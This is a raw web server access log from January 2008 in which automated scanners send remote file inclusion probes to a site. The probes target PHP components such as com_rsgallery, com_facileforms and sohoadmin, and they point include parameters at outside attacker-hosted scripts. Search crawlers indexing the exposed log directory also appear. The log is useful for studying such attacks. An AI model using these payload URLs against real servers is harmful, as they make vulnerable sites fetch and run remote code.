216.75.35.118 - - [11/Jan/2008:21:14:51 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.62.12.248 - - [11/Jan/2008:21:19:33 -0800] "GET /logs/access_070912.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
66.249.70.107 - - [11/Jan/2008:21:20:13 -0800] "GET /clipart/images/?N=D HTTP/1.1" 200 822 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
89.111.176.90 - - [11/Jan/2008:21:20:49 -0800] "GET /logs/access_070912.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://216.126.65.86/store/id? HTTP/1.1" 404 346 "-" "libwww-perl/5.805" "www.projectpr.com"
216.75.35.118 - - [11/Jan/2008:21:26:01 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
216.75.35.118 - - [11/Jan/2008:21:26:01 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:26:55 -0800] "GET /logs/access_070812.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:26:55 -0800] "GET /logs//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:26:58 -0800] "GET /logs/access_070812.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:26:59 -0800] "GET /logs//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:27:07 -0800] "GET /logs/access_070812.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:27:07 -0800] "GET /logs//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
87.106.46.84 - - [11/Jan/2008:21:34:47 -0800] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.46.84 - - [11/Jan/2008:21:34:53 -0800] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.46.84 - - [11/Jan/2008:21:39:34 -0800] "GET /logs/access_070812.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.803" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:43:05 -0800] "GET /logs/access_070912.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.8.120 - - [11/Jan/2008:21:44:28 -0800] "GET /logs/access.log HTTP/1.0" 200 103703 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:44:39 -0800] "GET /logs/access_070912.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.28.209 - - [11/Jan/2008:21:45:03 -0800] "GET /logs/?S=D HTTP/1.0" 200 4497 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
69.10.138.76 - - [11/Jan/2008:21:45:10 -0800] "GET /logs/access_070912.log//cgi-bin/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.23.29 - - [11/Jan/2008:21:48:15 -0800] "GET /logs/ HTTP/1.0" 200 4497 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:22:24:15 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:22:24:21 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.projectpr.com"
207.44.188.10 - - [11/Jan/2008:22:24:21 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.paradiseradio.org/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.projectpr.com"
204.9.78.190 - - [11/Jan/2008:22:24:49 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:22:26:36 -0800] "GET /logs/access_070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 318 "-" "libwww-perl/5.805" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:22:26:37 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.19.78.111 - - [11/Jan/2008:22:27:39 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.15.2.85 - - [11/Jan/2008:22:31:11 -0800] "GET //calendar.php?pg=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
204.9.78.190 - - [11/Jan/2008:22:32:05 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
204.9.78.190 - - [11/Jan/2008:22:32:06 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.250.23 - - [11/Jan/2008:22:32:59 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.218.250.23 - - [11/Jan/2008:22:32:59 -0800] "GET //skin/zero_vote/error.php?dir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.218.250.23 - - [11/Jan/2008:22:32:59 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:22:33:28 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:22:36:08 -0800] "GET /logs/access_070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 318 "-" "libwww-perl/5.805" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:22:36:09 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
59.106.19.18 - - [11/Jan/2008:22:37:18 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.15.2.85 - - [11/Jan/2008:22:41:54 -0800] "GET /logs/access_070912.log//calendar.php?pg=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
195.15.2.85 - - [11/Jan/2008:22:41:54 -0800] "GET /logs//calendar.php?pg=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.34.201.90 - - [11/Jan/2008:22:46:22 -0800] "GET /logs/access_070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.34.201.90 - - [11/Jan/2008:22:46:22 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.34.201.90 - - [11/Jan/2008:22:46:22 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
64.34.201.90 - - [11/Jan/2008:22:47:24 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
74.53.229.194 - - [11/Jan/2008:22:51:37 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
87.106.46.84 - - [11/Jan/2008:22:52:06 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 286 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.46.84 - - [11/Jan/2008:22:52:07 -0800] "GET /skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.46.84 - - [11/Jan/2008:22:52:12 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
74.53.229.194 - - [11/Jan/2008:22:54:29 -0800] "GET /logs/access_070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.229.194 - - [11/Jan/2008:22:54:29 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.229.194 - - [11/Jan/2008:22:55:20 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [11/Jan/2008:23:16:43 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [11/Jan/2008:23:16:44 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [11/Jan/2008:23:16:44 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 300 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [11/Jan/2008:23:20:42 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [11/Jan/2008:23:20:42 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [11/Jan/2008:23:20:42 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.140.49.69 - - [11/Jan/2008:23:22:17 -0800] "GET /logs/?M=A HTTP/1.0" 200 4497 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.projectpr.com"
64.140.49.69 - - [11/Jan/2008:23:23:09 -0800] "GET /logs/?D=A HTTP/1.0" 200 4497 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.projectpr.com"
64.140.49.69 - - [11/Jan/2008:23:23:59 -0800] "GET /logs/access_060412.log HTTP/1.0" 200 495751 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.projectpr.com"
64.140.49.69 - - [11/Jan/2008:23:25:15 -0800] "GET /logs/access_060312.log HTTP/1.0" 200 401131 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.projectpr.com"
64.140.49.69 - - [11/Jan/2008:23:26:00 -0800] "GET /logs/access_060212.log HTTP/1.0" 200 472803 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.projectpr.com"
64.140.49.69 - - [11/Jan/2008:23:26:43 -0800] "GET /logs/access_060112.log HTTP/1.0" 200 634753 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.projectpr.com"
62.116.117.149 - - [11/Jan/2008:23:27:00 -0800] "GET /logs/access.log/index.php?log=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803" "www.projectpr.com"
62.116.117.149 - - [11/Jan/2008:23:27:00 -0800] "GET /index.php?log=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.116.117.149 - - [11/Jan/2008:23:27:01 -0800] "GET /logs/index.php?log=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
69.57.128.49 - - [11/Jan/2008:23:27:48 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [11/Jan/2008:23:29:24 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [11/Jan/2008:23:29:25 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [11/Jan/2008:23:29:26 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805" "www.projectpr.com"
64.38.19.90 - - [11/Jan/2008:23:35:10 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [11/Jan/2008:23:35:10 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.38.19.90 - - [11/Jan/2008:23:35:10 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.113.234.180 - - [11/Jan/2008:23:36:24 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "voyager-hc/1.0" "www.projectpr.com"
38.113.234.180 - - [11/Jan/2008:23:37:54 -0800] "GET /contactus.html HTTP/1.0" 200 12620 "-" "voyager-hc/1.0" "www.projectpr.com"
69.57.128.49 - - [11/Jan/2008:23:42:01 -0800] "GET /logs/access_%3Cwbr%20/%3E070712.log//tools/send_reminders.php?noSet=0&includedir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [11/Jan/2008:23:42:01 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [11/Jan/2008:23:42:01 -0800] "GET /logs/access_%3Cwbr%20//tools/send_reminders.php?noSet=0&includedir=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:46:28 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:46:28 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:46:32 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:46:42 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:46:42 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:46:42 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:47:32 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:47:32 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:47:32 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:47:33 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:47:33 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:47:33 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:47:42 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:47:42 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:47:42 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:47:58 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:47:59 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:47:59 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.252.183 - - [11/Jan/2008:23:48:00 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.252.183 - - [11/Jan/2008:23:48:00 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.252.183 - - [11/Jan/2008:23:48:00 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:48:06 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:48:06 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.109.226 - - [11/Jan/2008:23:48:06 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:50:00 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:50:00 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:50:00 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:50:02 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:50:02 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.26.63.12 - - [11/Jan/2008:23:50:02 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.161.204.3 - - [11/Jan/2008:23:50:46 -0800] "GET /logs/access_070712.log/tools/send_reminders.php?noSet=0&includedir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.161.204.3 - - [11/Jan/2008:23:50:46 -0800] "GET /logs/access_070712.log/tools/send_reminders.php?noSet=0&includedir=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.161.204.3 - - [11/Jan/2008:23:50:46 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.161.204.3 - - [11/Jan/2008:23:50:47 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
213.161.204.3 - - [11/Jan/2008:23:50:47 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
